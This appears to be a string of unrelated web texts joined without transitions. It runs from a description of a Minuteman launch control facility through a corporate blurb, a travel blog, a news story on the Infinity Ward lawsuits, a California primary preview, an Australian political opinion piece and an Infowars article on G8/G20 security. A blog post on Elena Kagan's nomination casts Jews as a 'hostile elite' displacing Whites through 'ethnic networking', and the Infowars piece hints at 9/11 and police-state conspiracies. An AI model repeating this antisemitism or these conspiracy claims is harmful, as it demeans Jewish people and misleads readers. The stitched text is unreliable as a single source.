During the first half of 1961 , the national strategic concept completed a shift from massive retaliation to controlled response .
In consonance with the earlier concept , the Air Force had designed the Minuteman as a quick reacting mass attack weapon . . . .
A combat crew would fire a minimum of ten missiles .
In order to conform to the new concept , engineering changes had to be made to allow a combat crew in a control center to switch targets and to fire one or more missiles selectively , conserving the remainder for later use ....
Greater flexibility in targeting and firing required a significant extension to the limited survival time [ of each operational site ] .
The [ original ]
Minuteman facility design did not provide for the protection of the power supply ....
At a control center , power generators were above the ground ....
When and if these generators stopped functioning , the operational potential of the system would be reduced to only six hours .
Revised strategic concepts required that the weapon survive at least nine weeks after an initial enemy attack .
In September 1961 , Air Force headquarters authorized the Ballistic Systems Division to proceed with plans to harden the generators against nuclear blast .
The Division decided to install the generators in hardened underground capsules , located next to the Launch Control Center .
Construction was well underway at Wing II , located at Ellsworth Air Force Base , by the time these changes were proposed .
Consequently , the underground equipment capsules were introduced with the third Minuteman wing at Minot Air Force Base , North Dakota , in 1962 .
The main components located in the Equipment Building are an air conditioning unit , an environmental control system , power distribution equipment , and a standby diesel generator .
Blast valves , installed in the air ducts running between the Equipment Building and the Launch Control Center and between the Equipment Building and the air intake and air exhaust shafts , protect the air supply from contamination .
In the event of an emergency , the blast valves are designed to automatically seal off the capsules from the surface air .
Buried on the east side of the Equipment Building is a 3,700 - gallon water tank , and buried on the west side are a 14,000 - gallon diesel fuel storage tank and an emergency sewage tank .
The building 's apparatus would theoretically allow the equipment and crew in the Launch Control Center to function for up to nine weeks in isolation .
Between the Equipment Building and the Launch Control Center is a reinforced concrete room called the tunnel junction , which provides access to both facilities .
The tunnel junction leads through a second blast door to a 50 - foot access shaft containing an elevator and a vertical ladder to the aboveground Support Building .
It is possible that a nuclear attack could destroy the access shaft and tunnel junction , the normal exit for the missile combat crew .
For this reason , there is an emergency escape tube at the north end of the Launch Control Center .
The tube is made of corrugated steel and measures three feet in diameter .
Extending from the ceiling of the Launch Control Center , it penetrates upward through the earth for 52 feet , terminating just below surface .
The tube is filled with sand to prevent it from collapsing .
In the event of an emergency , the crew would dig out the sand , crawl up the tube , and escape through a hatch at ground level .
Vehicle Storage Building
A one - story , front - gabled Vehicle Storage Building stands at the entrance to the November - 1 Launch Control Facility , a short distance inside the electric gate .
The style of the building matches the simple , utilitarian style of the Launch Control Support Building , just to the south .
The Vehicle Storage Building was constructed in 1966 , as the last major feature of November - 1's configuration .
Measuring 40 ' x 32 , ' the building was constructed of light wood framing on a reinforced concrete pad foundation .
The building 's primary facade faces southwesterly and includes a large central doorway flanked by two smaller openings of the same type .
The doorways are fitted with overhead steel doors patterned with a horizontal grid .
The original cementitious - asbestos shingle siding ( Transite ) was replaced in the mid-1980s by horizontal steel siding in a wide - lap weatherboard style .
Trimmed with metal cornerboards and stamped with a wood - grain texture , the siding is painted a cream color , with dark brown trim on doors and eaves .
The roof is covered with light brown asphalt shingles which terminate at tight , open eaves and a narrow vergeboard trim at the gable ends .
The southeast - facing side of the roof is pierced at the northeast corner by a furnace flue .
On the northwest - facing side is a gravity vent .
Floodlights are attached at the eave comers at the primary ( southwest ) facade of the building .
Two doors are located on the southeast side of the building .
One accesses a small interior furnace room in the northeast comer , and the other provides access to the rest of the interior storage space .
Pavement meets the garage doors at the primary facade , then curves around the southeast side of the building to form a small patio , which extends the length of the southeast facade .
The remainder of the site surrounding the storage building is covered with gravel and grass .
Age and deterioration forced the demolition of the storage building 's original oil furnace and diesel fuel tank in 1995 .
Although the replacement furnace remained inside , a new 1,000 - gallon fuel tank was placed outdoors , directly to the rear ( northeast ) of the building , on a reinforced concrete pad surrounded by a vertical picket fence .
A pole topped with a weathervane extends from inside this enclosure .
Originally attached at the east end of the Launch Control Support Building , the weathervane was relocated to the Vehicle Storage Building in the mid-1980s , when the Support Building received new siding .
Associated Structures
Several aboveground and underground radio antenna structures are dispersed within the Launch Control Facility 's fenced grounds .
These antennae are part of a complex communication network developed to maintain missile launch control and communication during and after a nuclear attack .
Hard Ultra - High - Frequency Antenna
Approximately 125 feet east of the Vehicle Storage Building is the blast - hardened Ultra - High­ Frequency Antenna .
The primary purpose of the installation is to provide a channel between the N - 1 Launch Control Center and the Airborne Launch Control Center , an aircraft that functions as a back - up control center in the event ground - based control centers are incapacitated by a nuclear blast .
The antenna was also designed to receive alert , launch , and execution orders from Strategic Air Command communications rockets and to permit communications via Air Force satellites .
The Ultra -High - Frequency Antenna consists of a massive , cast - steel frustum , bolted to a thick , reinforced - concrete square slab .
Surmounting the frustum is a conical , white fiberglass weather dome .
Hard High - Frequency Receive Antenna
High - frequency radio provides Strategic Air Command with point - to - point voice communications as a backup of the land - line systems for control of the weapon systems .
The High - Frequency Receive Antenna is set into the ground approximately 67 feet south of the Launch Control Support Building .
The structure consists of a reinforced - concrete cylinder measuring approximately 16 feet in diameter and 37 feet deep ( outside dimensions ) .
The cylinder is covered by a concrete cap .
Distributed evenly around the perimeter of the structure are five small ports , each containing a slender , ballistically actuated , steel , monopole antenna .
This antenna system was deactivated in 1971 .
When it was still in use , one monopole extended from the cylinder at all times .
If the exposed antenna were to have been damaged during an attack , a replacement could have been quickly deployed through the detonation of an explosive squib in an adjacent port .
Survivable Low Frequency Communications System
This is a low - frequency radio teletype which has receive - only capability .
Installed in 1966 - 1967 , the system consists of a buried antenna , a receiver installed in an electronic rack inside the Launch Control Center , and a miniature teleprinter mounted on the crew console in the Launch Control Center .
ICBM Super - High Frequency Satellite Terminal
This antenna structure is located a few feet from the southwest corner of the Launch Control Support Building .
It consists of an aboveground pole with a large white rounded dome .
Weather Antenna
This antenna is mounted on a wooden pole against the north side of the Launch Control Support Building .
Water Tanks
Well water is stored against the north side of the Launch Control Support Building in underground tanks .
Access covers appear directly outside the doors to the water treatment room in the Support Building .
De-watering Well
Located several feet from the south side of the Launch Control Support Building , this pump prevents groundwater from building up and damaging the Equipment Building , Launch Control Center , and associated underground facilities .
November - 1 Launch Control Facility was one of several Launch Control Facilities in Wing V with troublesome high ground water .
Intake / Exhaust Ducts
Approximately 50 feet from the southwest comer of the Launch Control Support Building stand two large brown ducts which provide intake and exhaust air to the underground Launch Control Center and Equipment Building .
The ducts are fitted with 36 - inch blast valves designed to seal off the subterranean facilities from outside air in the event of a nuclear attack .
Helipad
Although helipads were not installed at Wing V launch control facilities until 1969 , helicopters have served the wing since 1965 .
Fifteen helicopters were originally assigned to Warren , cutting down road time for base vehicles , which were averaging 600,000 miles per month transporting people and food supplies between the base and the Minuteman launch control facilities .
The concrete helipad at November Flight measures 50 ' x 50 ' .
Located outside the security fence at the north end of the Launch Control Facility , it receives anyone of six UH - 1N " Twin Huey " helicopters currently maintained by Warren Air Force Base .
Sewage Lagoon
Located just outside the perimeter fence , approximately 200 feet northwest of the Launch Control Support Building , is a sewage lagoon used for treating waste materials produced at the Launch Control Facility .
The sewage lagoon is an open settling basin with a 39,500 - cubic - foot capacity .
Surrounded by an earthen berm , it is 118 feet square at ground level and tapers to 70 feet square at the base .
[ Balance of 50 - page report which traces history of ICBM development omitted . ]
Laird Connectivity
Laird Connectivity simplifies the enablement of wireless technologies with market - leading wireless modules and antennas , integrated sensor and gateway platforms , and customer - specific wireless solutions .
When you need unmatched wireless performance to connect electronics with security and confidence , Laird Connectivity delivers — no matter what .
Harvard Law professor Noah Feldman had a bit of Jewish triumphalism published recently in the NY Times ( “ The Triumphant Decline of the WASP “ ) .
Now that the WASPs have gone down to zero seats on the Supreme Court and there ’s a Black president , it ’s time to congratulate the WASPs for holding onto their principles even though their principles caused their demise : WASPs as the first and only proposition ethnic group .
Satisfaction with our national progress [ by having 3 Jews on the Supreme Court and no WASPs ] should not make us forget its authors : the very Protestant elite that founded and long dominated our nation ’s institutions of higher education and government , including the Supreme Court .
Unlike almost every other dominant ethnic , racial or religious group in world history , white Protestants have ceded their socioeconomic power by hewing voluntarily to the values of merit and inclusion , values now shared broadly by Americans of different backgrounds .
The decline of the Protestant elite is actually its greatest triumph .
I would go beyond Feldman by saying that no other elite has ever voluntarily allowed itself to be eclipsed because of steadfast adherence to principle .
Feldman is doubtless quite happy because he realizes that the new elite ( including himself ) will not allow itself to be eclipsed by such madness –suicide by principle .
Indeed , Kagan ’s arrival on the Supreme Court is a sort of official coming out party for the new elite .
It ’s been there for quite some time , but the Kagan nomination is an in - your - face - demonstration of the power of Jewish ethnic networking at the highest levels of government .
And the first thing one notices is that the new elite has no compunctions about nominating someone for the Supreme Court even though she has no real qualifications .
So much for the principles of merit and inclusion : Inclusion does not apply to WASPs now that they have been deposed .
And the principle of merit can now be safely discarded in favor of ethnic networking .
As I noted previously ,
This is a favorite aspect of contemporary Jewish self - conception — the idea that Jews replaced WASPs because they are smarter and work harder .
But this leads to the ultimate irony : Kagan is remarkably unqualified to be a Supreme Court Justice in terms of the usual standards : judicial experience , academic publications , or even courtroom experience .
Rather , all the evidence is that Kagan owes her impending confirmation to her Jewish ethnic connections ( see also here ) .
The same goes for Jewish over - representation in elite academic institutions –far higher than can be explained by higher Jewish IQ .
Does anyone seriously think that Jewish domination of Hollywood and the so much of the other mainstream media ( see , e.g. , Edmund Connelly ’s current TOO article ) is about merit rather than ethnic networking and solidarity ?
And then there ’s the addiction of the new elite to affirmative action for non-Whites .
Whatever else one can say about the new elite , it certainly does not believe in merit .
The only common denominator is that Whites of European extraction are being systematically excluded and displaced to the point that they are now underrepresented in all the important areas of the elite compared to their percentage of the population .
The new elite distinguishes itself mainly by its hostility to the traditional people and culture of those they displaced .
It is an elite that can not say its name .
Indeed the ADL was all over Pat Buchanan for merely mentioning that Kagan is Jewish and that , upon her confirmation , Jews would be one - third of the Supreme Court .
This lack of principle at the foundation of the new elite extends to every area of the culture :
The financial elite that produced the greatest economic recession since the Great Depression by participating in and massively profiting from wholesale fraud in the mortgage market ; the academic elite that systematically excludes ideas related to the legitimacy and reasonableness of White ethnic interests ; the media elite that routinely provides invidious depictions of Whites and especially Whites with a sense of White identity and ethnic interests ; the political elite that fails to perform the most basic function of government : protecting the people and culture from invasion and displacement ; the organized Jewish community with its influence spread throughout the government , routinely supporting an expansive ethnonationalism in Israel while condemning any hint of ethnonationalism in White Americans .
This lack of principle will certainly extend to Elena Kagan once she accedes to the Supreme Court .
Her academic publishing record , meager as it is , indicates someone who does not believe in principles such as free speech :
Kagan [ will ] be quite willing to fashion her legal arguments to attain her liberal / left policy goals , and that is exactly what her other writings show .
Her 1993 article “ Regulation of Hate Speech and Pornography After R.A.V , ” ( 60 University of Chicago Law Review 873 ; available on Lexis / Nexis ) indicates someone who is entirely on board with seeking ways to circumscribe free speech in the interests of multicultural virtue : “ I take it as a given that we live in a society marred by racial and gender inequality , that certain forms of speech perpetuate and promote this inequality , and that the uncoerced disappearance of such speech would be cause for great elation . ”
She acknowledges that the Supreme Court is unlikely to alter its stance that speech based on viewpoint is protected by the First Amendment , but she sees that as subject to change with a different majority : The Supreme Court “ will not in the foreseeable future ” adopt the view that “ all governmental efforts to regulate such speech … accord with the Constitution . ”
But in her view there is nothing to prevent it from doing so .
Clearly , she does not see the protection of viewpoint - based speech as a principle worth preserving or set in stone .
Rather , she believes that a new majority could rule that “ all government efforts to regulate such speech ” would be constitutional .
All government efforts .
I suspect that the new elite will continue to pay lip service to the founding documents , the rule of law , and high principles like merit .
But in reality these documents will be interpreted in ways that benefit the new elite and allow it to consolidate and maintain its power .
I believe that with one more vote after Kagan ’s confirmation , the First Amendment will be a historical curiousity .
And the principle of merit will mainly come down to promotional hype in the media ( when not obviously a matter of affirmative action ) .
Feldman represents Kagan as an exemplar of the shift to an American meritocracy — despite her remarkably undistinguished record .
( A Google ssearch for “ Elena Kagan ” and “ Harriet Miers ” yields dozens of articles on the very real question of her qualifications . )
Senator Jeff Sessions correctly called Kagan the least experienced nominee “ at least in the last 50 years . ”
He also noted that his main concern about her is his fear that she lacks a firm sense of the rule of law–in other words , that she does not see law as defending the principles that were so sacrosanct to her WASP antecedents :
“ Will she as a judge subordinate herself to the constitution and keep her political views at bay ? ”
That is the question precisely .
And all the evidence is that Kagan , like the rest of the new elite , will reject principle in favor of interest .
We already see that honest , empirically grounded analyses of the Jewish role in the new elite and how this new elite serves Jewish ethnic interests will continue to be proscribed .
As in the USSR , the topic will be officially off limits .
( Solzhenitsyn makes this point in 200 Years Together . )
Finally , I agree with Feldman that the WASP elite was extraordinarily principled –uniquely so .
This is not the entire story , however , since the WASPs did mount an ethnic defense culminating in the 1924 immigration law .
It failed , in my opinion mainly because of the rise of Jews as a hostile elite who attained their position by seizing the moral high ground and making alliances with and promoting the more principled ( suicidal ) component of the WASP elite .
( WASPs like Madison Grant , Lothrop Stoddard , and A. Lawrence Lowell were not part of the the WASP suicide mission ; they could see the writing on the wall and I think they understood who the enemy was . )
As Israel Zangwill said in opposing the 1924 immigration restriction law , “ You must make a fight against this bill ; tell them they are destroying American ideals .
Most fortifications are of cardboard , and if you press against them , they give way ” ( see here , p. 266 ) .
Jewish intellectuals understood that WASP dedication to principles and ideals was their soft spot .
We can expect that the new elite will not be similarly inclined to adhere to principles at the expense of self - interest .
The result will be a catastrophic loss to the people who founded and built America .
For most people , most of the time , coming home is an inevitable part of going away .
But it still feels weird .
Rafiq Copeland shares his recent homecoming experience .
For most people , most of the time , coming home is an inevitable part of going away .
But it still feels weird .
That feeling of being homeward bound always catches me by surprise .
It ’s the feeling of excitement to be seeing friends and loved ones , familiar places , combined with pleasant nostalgia for where you have been , and yet muted by regret for things you might have missed out on .
Or maybe that ’s just the way you feel after watching four consecutive romantic comedies on an in - flight entertainment system .
A few weeks ago my wife and I really were taken by surprise by the feeling of heading home .
We had been living in the UK — Africa before that — and had just finished our final days of work and packed up our flat .
The plan was to fly from London to New York , then down to St Lucia for a couple of months working holiday .
I had taken to playing Calypso music in the kitchen and reading Derrick Walcott .
And then my wife ’s mum got sick .
The family back home insisted that we should n’t come back , but we got the impression they did n’t mean it .
So we changed our tickets .
And 48 hours later we were watching romantic comedies on a Qantas flight to Melbourne .
Surprise .
We had been away for a year and half .
So we ’re at Tullamarine Airport at 5 am .
Practically empty .
Large posters announce that Border Security is being filmed today , but there are no cameras to be seen .
Just bleary eyed travelers clutching travel wallets and reeking of 25 hour flight sweat .
A customs official once told my father the reason why everyone looks awful in their passport photo is because this is how you actually look after a long haul flight .
The lady behind the desk gives me a warm grin and says “ G’day love .
Do you mind if I have a sticky at your passport ? ”
Home again , home again .
We emerge from the famous wailing wall , scene of so many family reunions , so much emotion , but at this hour things are relatively subdued .
There is no one to greet us .
Our lift is late .
When he arrives he has a handmade sign with our names on it .
He tells us he is late because he spent so long making the sign .
It was a nice thought .
Driving home in the drizzle , everything seems greener than it was when we left .
Everything still seems flat and brown compared to where we have come from .
It occurs to me that the day before we decided to come home I put my winter coat in a charity bin .
And then we are home .
Just like that .
When you return from a long trip you get about two days of being a minor celebrity .
Everybody is excited to see you .
People hear you are at the pub and change their plans to come and say hello .
It ’s a shame really , because for those two days you are usually knackered with jetlag and feeling guilty about not making the time to visit your grandma in the old folk ’s home .
But then , emphatically , it is back to normal .
Life goes on .
After a couple of weeks you are so back into the swing of things that you bump into people you have n’t seen for a year and half and you forget to act excited to see them .
It ’s not a bad thing — actually it ’s great .
Slipping into your old friendships and life like you never missed a beat .
But of course you need a job and a place to live and ….
And after that it ’s not really suitable for a travel blog anymore is it ?
( Visited 22 times , 1 visits today )
Image caption
The game puts the player in the role of present - day combat troops
Two months after Call of Duty : Modern Warfare 2 launched to a huge media fanfare , its publisher Activision announced that it had taken more than $ 1bn in sales .
The sales put the video game in an elite club alongside other entertainment franchises such as James Cameron 's Avatar and Michael Jackson 's Thriller .
In fact it beat both to become the most successful entertainment launch of all time , in terms of its first 24 hours on sale .
Its success should have allowed its creators to reap the rewards and become the leading lights of the video games industry .
Instead they were ignominiously sacked and their studio now teeters on the brink of collapse .
Call of Lawyers
Infinity Ward is a Californian video games developer of just under 100 employees .
They created the first Call of Duty game in 2003 and saw the series gradually increase in popularity until the breakthrough hit Call of Duty 4 : Modern Warfare switched the setting from World War II to the present day .
Until recently the studio was lead by Jason West and Vince Zampella .
Then in March they were suddenly dismissed by owner Activision for unspecified " breaches of contract and insubordination " .
Image caption
The first Call of Duty game appeared in 2003
There had been rumours of a rift between Infinity Ward and Activision but the move still astonished the games industry .
" I was surprised at how public and ugly it got very quickly , " says Matt Martin , editor of website GamesIndustry.biz .
" I 'd imagine a lot of ego and pride has been bruised , when Activision would rather let studio heads go than give them the creative control they thought they were entitled to . "
" It 's also difficult to argue it 's all about creativity when you 're slinging mud at your old employer and demanding millions of dollars from them , " adds Martin .
Almost immediately after being sacked the pair launched a $ 36 million lawsuit against their former employer .
They accused Activision of operating in an " Orwellian fashion " and concocting false allegations in order to fire them - thereby gaining the company full creative control of the Call of Duty franchise and avoiding paying agreed bonuses .
We expect the Infinity Ward studio will be essentially closed after their next Map Pack release Mike Hickey , Janco Partners
The lawsuit accused Activision of " astonishing arrogance and unbridled greed " and complained that Activision forced the pair " to sue for their pay - in the hopes of either getting away with not having to pay them anything , or maximising its leverage to reduce that pay " .
The suit even quotes Activision CEO Bobby Kotick 's famous statement about fostering a company culture instilled with " scepticism and pessimism and fear " .
Activision then countersued , making it clear that they were aware West and Zampella had secretly held talks with Activision 's arch rival Electronic Arts .
Activision also claimed that the pair had tried to " steal " Infinity Ward and " hijack Activision 's assets for their own personal gain " .
Although Infinity Ward does not have control over the Call of Duty name as a whole , the situation with the Modern Warfare sub - brand is less clear and Activision has warned fans that West and Zampella 's legal efforts may seriously delay any new sequel .
And that was before the exodus at Infinity Ward began .
Two by two
At time of writing over 30 employees have left Infinity Ward including all the lead designers of Modern Warfare 2 .
Midway through the migration , West and Zampella unveiled their new company Respawn Entertainment .
Image caption Activision has just signed a deal with Bungie , makers of Halo
Just as Activision had predicted , this turned out to be a new studio created with help from Electronic Arts .
It has quickly begun to announce the hiring of many of the errant Infinity Ward veterans .
To complicate the picture further , 38 current and already exited staff have filed a separate lawsuit against Activision for breach of contract and unpaid bonuses , royalties and profit shares .
The " Infinity Ward Employee Group " alleged that Activision had withheld the money " in order to force them to keep working for Activision so that Activision could receive delivery of Modern Warfare 3 " .
As it had done before , Activision dismissed the lawsuit as " meritless " .
" It would seem that the studio shock from massive employee defections has likely destroyed any remaining creative culture within Infinity Ward , " said analyst Mike Hickey of research firm Janco Partners .
" We expect the Infinity Ward studio will be essentially closed after their next Map Pack release . "
I do n't think the average consumer cares or recognises who makes the games , only whether they are good or bad Matt Martin , GamesIndustry.biz
Mr Hickey expects the development of Modern Warfare 3 to be spread between two Activision studios not historically tied to the franchise .
" Delaying Modern Warfare 3 would n't necessarily harm the Call of Duty brand so long as new titles in the franchise continue to be released , " suggests Mr Martin .
" It might do the series good for a 2011 Call of Duty title to be something new entirely and give Modern Warfare 3 time to come together out of the limelight .
" Activision has big teams able to work on demand - as it has in the past with various Guitar Hero spin - offs for example - it can afford to scale up and down as and when it needs to , " says Mr Martin .
Bungie jump
As the predictions of Infinity Ward 's demise , and the implied negative effect this would have on the Call of Duty franchise , reached their crescendo Activision played their trump card .
Image caption Activision also co-owns the World of Warcraft online game
They announced a 10 - year exclusive contract with developer Bungie , creators of Halo - one of the few video game series that can compete with Call of Duty on an equal footing .
The deal immediately papered over any holes in Activision 's portfolio that a collapse at Infinity Ward might have produced .
" We understand that Bungie has been working on its new multiformat game for some time and from that we assume that this game could come out in 2011 - that would help to offset any fall in performance or delay with Modern Warfare 3 , " said Mr Hickey .
The situation is especially ironic given that Bungie was previously a wholly owned subsidiary of Microsoft .
Unlike the relationship between Activision and Infinity Ward , the lead creatives at Bungie tugged themselves free from the software firm after they made it clear they wanted more creative freedom .
Activision though seems to be banking that games players really do n't care , and in the majority of circumstances are completely unaware , of who exactly makes their games , said Mr Martin .
" It 's a sign of the immaturity of the industry " , he says .
" Creatives in Hollywood prove themselves in multiple genres or different disciplines .
The majority of game makers make the same game over and over for different systems , or make variations on a theme . "
" West and Zampella have made some great first person shoot 'em-ups and two great franchises , but it 's only one theme that 's evolved over time , " he adds .
" It might hurt egos , but I do n't think the average consumer cares or recognises who makes the games , only whether they are good or bad . "
After enduring months of expensive campaigning by corporations and candidates , California voters go to the polls today to decide primaries for governor and U.S. Senate and races for a number of statewide and local offices - as well as ballot measures to allow the San Francisco 49ers to build a new stadium in Santa Clara and to change primary elections in the state .
Just one - third of California 's almost 17 million registered voters - a record - low turnout - are expected to weigh in , according to an analysis by the Field Poll .
The lack of voter interest reflects the lack of drama in two high - profile Democratic races , where Attorney General Jerry Brown , a candidate for governor , and incumbent Sen. Barbara
Boxer face no strong competition from their party .
By contrast , GOP voters will decide two of the most - watched political contests in the nation - and whether to nominate women for the first time as Republican candidates for governor and U.S. Senate .
In California 's gold - plated GOP governor 's race , first - time candidate Meg Whitman - the former eBay CEO who has put $ 71 million of her own money into the race - leads state Insurance Commissioner Steve Poizner , who has dropped $ 24 million of his money .
Democrat Brown , the former two - term governor and Oakland mayor , cleared the field of any serious contenders months ago .
Seeking challenger to Boxer
In the GOP U.S. Senate race , former Hewlett - Packard CEO Carly Fiorina - who has invested more than $ 5 million of her own funds in her campaign - is leading in the polls against moderate former South Bay Rep.
Tom Campbell and Assemblyman Chuck DeVore of Irvine , a Tea Party favorite .
The winner will challenge Boxer , who has faced a feisty but longshot challenge from former Slate.com blogger Mickey Kaus as she seeks a fourth term .
California voters also will decide who will square off in November for the lieutenant governor 's post .
On the Democratic side , San Francisco Mayor Gavin Newsom , with the edge in fundraising , polling and endorsements , is the favorite over Los Angeles City Councilwoman Janice Hahn , who has attacked him for not knowing what the position entailed several months before announcing he was running .
In the GOP primary , recently seated Lt. Gov. Abel Maldonado , a moderate from Santa Barbara County , is facing a challenge on the right from Sen. Sam Aanestad of Grass Valley ( Nevada County ) .
Two district attorneys from opposite ends of the state appear to be the favorites to win their party 's nominations for attorney general in crowded fields .
San Francisco District Attorney Kamala Harris , a Democrat , has polled well against six challengers but has been hit hard over the city 's drug - lab scandal by her most well - funded opponent , former Facebook privacy officer Chris Kelly , who has put $ 12 million of his own money into the race .
GOP attorney general 's race
At the same time , Republican Los Angeles District Attorney Steve Cooley has been attacked by his right - of - center opponents , state Sen .
Tom Harman and former Chapman Law School Dean John Eastman , for his criticism of the state 's " three strikes " sentencing law .
California voters also will decide two measures that would affect elections and campaigns .
Proposition 14 would place all candidates from all parties in the same primary , with the two candidates with the most votes advancing to the general election even if they 're both from the same party .
Proposition 15 would create a pilot program to publicly fund the campaigns for secretary of state .
Two ballot measures with major financial backing from corporations also will be decided .
The campaign for Proposition 16 , supported by $ 46 million in funding from Pacific Gas and Electric Co. , would bar communities , including San Francisco and Marin County , from forming public power agencies without the approval of two - thirds of local voters .
At the same time , the campaign for Proposition 17 - which would offer discounts to drivers who have maintained continuous coverage while allowing insurers to raise rates for drivers whose coverage has lapsed , has received $ 17 million from its chief backer , Mercury Insurance .
Santa Clara votes on 49ers
Perhaps the highest - profile measure in the Bay Area is Santa Clara 's Measure J , which would clear the way for the San Francisco 49ers to build a new $ 937 million stadium next to the Great America amusement park .
The team , which has spent more than $ 4 million on the campaign , promises that no money from the city 's general fund would be spent on the stadium .
Opponents , who have raised about $ 20,000 , argue that the stadium deal is too big a risk for Santa Clara .
Bay Area voters also will decide a dozen tax measures to benefit local school districts .
Chronicle staff writers John Wildermuth , John Coté , Nanette Asimov , Marisa Lagos and Carolyn Jones contributed to this report .
opinion Senator Stephen Conroy has done such a good job as Communications Minister that he should be promoted to take over the Finance Ministry even before incumbent Lindsay Tanner retires at the next election .
It ’s important that new Prime Minister Julia Gillard appoint someone with a good track record to be the next Finance Minister .
The Department of Finance and Deregulation is one of the more important departments in the Federal Government , and it needs a firm and steady Minister to keep it on an even keel .
The position would represent a promotion for Conroy , as Communications is still seen as a mid-level ministry in the Federal Government – not as important as , say , the Treasury or Health , but more important than Sport , for example .
Here ’s why we think Conroy should get the job .
1 . He ’s degree - qualified : Conroy has a Bachelor of Economics from the Australian National University , which means he will understand many of the financial concepts key to the finance ministry .
Many of his political colleagues do n’t have economic qualifications , and some do n’t even have degrees .
But Conroy will be down with the financial lingo .
2 . His employment history : Before he entered politics he served as superannuation officer with the Transport Workers Union in Victoria , adding to his understanding of the finance portfolio .
3 . He has been the shadow minister : From 2001 through 2003 , Conroy served as the Shadow Minister for Finance , Small Business and Financial Services .
He has also had lengthy stints as the Shadow Minister for Financial Services , Regulation and Corporate Governance .
4. Committee work : Conroy has demonstrated his interest in the finance portfolio through serving on numerous Senate finance committees for many years – such as the Finance and Public Administration : Reference Committee , the Corporations and Financial Services Committee and the Corporations and Securities Committee .
5 . He worked closely with Tanner on a number of financial deals related to the National Broadband Network – indeed , out of all the Ministers in Rudd ’s Labor Government , it was Tanner that Conroy worked closest with over the past two and a half years .
6. Political allegiance : Conroy is known to be a staunch member of the Labor right faction which catapulted Gillard into power last week .
It would be appropriate that Gillard reward several members of that faction with Cabinet promotions .
7. Ministerial performance : Conroy is one of the only Rudd ministers to be successfully delivering a major election policy – the National Broadband Network .
The NBN policy is extremely popular in the electorate and it would be fitting for Gillard to reward its chief proponent .
8. Promoting Conroy would allow Gillard to distance him from the internet filter policy , which is extremely unpopular in the electorate .
The PM could then gradually weaken that policy ( for example , by implementing opt - in or opt - out provisions ) so that it does n’t become an election issue .
9 . A major task of the Finance Minister is to administer Government internal technology policy , particularly through working with the Australian Government Information Management Office within the Department of Finance and Deregulation .
Conroy ’s experience in the technology portfolio would give him insight into how technology is best used in the public sector and how it can better adopt Web 2.0 - style technologies .
10 . Conroy ’s experience in dealing with Telstra and the NBN have given him solid experience of complicated financial situations .
This would be to his advantage in the Finance portfolio .
All in all , the evidence is overwhelming that Communications Minister Stephen Conroy should be promoted to be the next Minister for Finance and Deregulation when new Prime Minister Julia Gillard conducts her inevitable cabinet reshuffle .
Go Conroy !
Image credit : Office of Stephen Conroy
Kurt Nimmo
Infowars.com
June 15 , 2010
Okay , sorry about the sarcastic headline .
Most of us know al - Qaeda does not have an air force .
It does n’t even have an army and if Osama ’s supposed terrorist operations are any indication — underwear , shoe , and dud propane tank bombers that invariably screw up — the infamous terrorist group is almost a complete failure , even though we are told and expected to believe without question Osama and his cave dwellers suspended the laws of physics and made NORAD stand down on September 11 , 2001 , among other magic tricks .
Canada will be prepared if al - Qaeda or Kim Jong - il get any funny ideas .
Ottawans can expect CH - 146 Griffon and CH - 124 Sea King helicopters , CP - 140 Aurora patrol aircraft , and CF - 18 Hornet fighter aircraft buzzing around this month .
“ Due to the nature of security operations , further details including aircraft numbers , specific times , points of departure and flight paths will not be provided , ” a Canada National Defense press release states .
One has to ask why all the military hardware ?
Does Canada expect North Korea to invade during the summit ?
Is it possible China or Russia will launch a sneak attack ?
NORAD plans to get in on the action .
“ Both air component support to RCMP , which includes patrols and airlift of people and equipment , and NORAD assistance in the form of aerospace warning and control may be seen during this time . ”
According to the North American Aerospace Defense Command , “ Aerospace warning includes the monitoring of man-made objects in space , and the detection , validation , and warning of attack against North America whether by aircraft , missiles , or space vehicles , through mutual support arrangements with other commands . ”
Maybe they know something we do n’t .
Maybe Hugo Chávez has a space platform bristling with missiles .
You never know .
A d v e r t i s e m e n t
“ The G8 - G20 ISU is a joint forces team comprised of security experts collaborating together to ensure the safety of the Heads of State and the community , ” the press release continues .
“ It includes members of the RCMP , Ontario Provincial Police , Toronto Police Services and Peel Regional Police , as well as the Canadian Forces .
NORAD is working closely with the ISU as one of the partners involved in security operations . ”
“ No amount of righteous government bluster about living in post - 9/11 protection paranoia , last week ’s bank firebombing in Ottawa or the precedent of hosting two back - to - back summits can explain how an $ 18 - million security tab for the G20 in Pittsburgh last September , which involved 4,000 police , must balloon to a billion dollars in Toronto requiring 10,000 cops on the ground , ” the National Post opined last month .
Not unless the government has a message to send — not to al - Qaeda or its phantom air force but to the people of Canada : welcome to the Maple Leaf Police State .
Public Safety Minister Vic
Toews said a billion dollars is a price worth paying to prevent anarchists from torching another bank .
Back in the day when anarchists were anarchists and not police agents provocateurs , anarchists liked to quip that the police are here to protect the banks and the rest of us are on our own .
A modernized version of this adage would state that the cops — and NORAD , the North American Aerospace Defense Command , and Canadian Forces — are here to protect the global elite and their political minions as they plot world government and engage in photo ops during the G - 8 and G - 20 .
If things get out of hand in Ottawa Canadians can look forward to U.S. troops coming to the rescue .
On February 14th , 2008 , Canada and the U.S. signed an agreement allowing the deployment of U.S. troops inside Canada .
It apparently was n’t a big deal because the event received minimal media coverage in Canada and the U.S .
Back in 2002 Lord Rumsfeld came up with the idea that Canada is part of the U.S. geopolitical and military agenda .
“ Defense Secretary Donald Rumsfeld announced unilaterally that US Northern Command would have jurisdiction over the entire North American region , ” a Toronto Star editorialist wrote at the time .
“ Canada and Mexico were presented with a fait accompli .
US Northern Command ’s jurisdiction as outlined by the US DoD includes , in addition to the continental US , all of Canada , Mexico , as well as portions of the Caribbean , contiguous waters in the Atlantic and Pacific oceans up to 500 miles off the Mexican , US and Canadian coastlines as well as the Canadian Arctic . ”
Now that the military command structures of Canada and the U.S. are integrated , it is time to get the commoners accustomed to military aircraft buzzing around and militarized cops training on public streets .
The billion plus dollar security arrangements in Ottawa are not about protecting our rulers from terrorists or even anti-globalization demonstrations .
Attack helicopters and cops in storm trooper uniforms are about getting Canadians used to living in a police state .
This article was posted : Tuesday , June 15 , 2010 at 4:27 am
Print this page .
Infowars.com Videos :
Comment on this article
What are the market forces that have created this peculiar salary structure ?
